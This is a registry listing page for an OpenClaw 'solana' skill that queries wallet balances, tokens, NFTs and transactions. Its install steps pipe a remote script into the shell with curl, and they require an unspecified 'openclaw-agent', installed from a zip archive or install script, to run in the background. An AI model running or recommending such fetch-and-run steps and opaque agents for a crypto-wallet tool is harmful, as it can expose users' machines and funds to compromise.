ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 4/5

solana

Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.

Why use this skill?

Easily interact with Solana on-chain data: check wallet balances, view SPL tokens, track NFTs, and monitor transaction history with the OpenClaw Solana skill.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/solana-ifxeq
Or

What This Skill Does

The Solana skill for OpenClaw empowers users to interact directly with the Solana blockchain from their command line or AI agent interface. It bridges the gap between complex blockchain data and human-readable insights by providing seamless tools for querying wallet balances, tracking SPL token holdings, monitoring NFT metadata via Metaboss, and reviewing transaction histories. Whether you are managing personal assets or performing technical research on the ledger, this skill acts as a robust gateway to on-chain data.

Installation

To begin using the Solana skill, you must first satisfy the local environment requirements.

  1. Install the OpenClaw agent: Follow the instructions provided for your operating system (Windows via the zip archive or macOS via the installation script).
  2. Install the Solana CLI using the command: sh -c "$(curl -sSfL https://release.solana.com/stable/install)".
  3. Configure your RPC endpoint: solana config set --url https://api.mainnet-beta.solana.com.
  4. Install the skill via OpenClaw: clawhub install openclaw/skills/skills/hightower6eu/solana-ifxeq.
  5. Optionally install Metaboss using cargo install metaboss for advanced NFT metadata querying.

Use Cases

  • Asset Management: Quickly verify your current SOL and SPL token balances without logging into a browser wallet.
  • Transaction Auditing: Review recent activity on a specific address to confirm deposits, withdrawals, or NFT minting events.
  • Technical Research: Extract raw account data or decode specific NFT mint information for development or compliance purposes.
  • Market Monitoring: Use the watch command to keep a real-time eye on wallet balances or specific on-chain events.

Example Prompts

  1. "Check the current SOL balance for the wallet address [ADDRESS] and list all my SPL token accounts."
  2. "Show me the last 10 transactions for address [ADDRESS] and confirm the status of the transaction with signature [SIGNATURE]."
  3. "Fetch the metadata for this NFT mint address [ADDRESS] using the metaboss utility."

Tips & Limitations

  • Safety: Always double-check addresses before executing queries to ensure you are looking at the correct data. This skill is for read-only monitoring; it does not sign transactions, which protects your private keys.
  • Dependencies: The openclaw-agent must be active for the skill to communicate with the network. If queries hang, check that the agent is running in the background.
  • Performance: Public RPC nodes can experience rate limiting. If you find queries failing, consider using a private RPC provider URL in your configuration.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-solana-ifxeq": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#solana#blockchain#web3#crypto#defi
Safety Score: 4/5

Flags: network-access, code-execution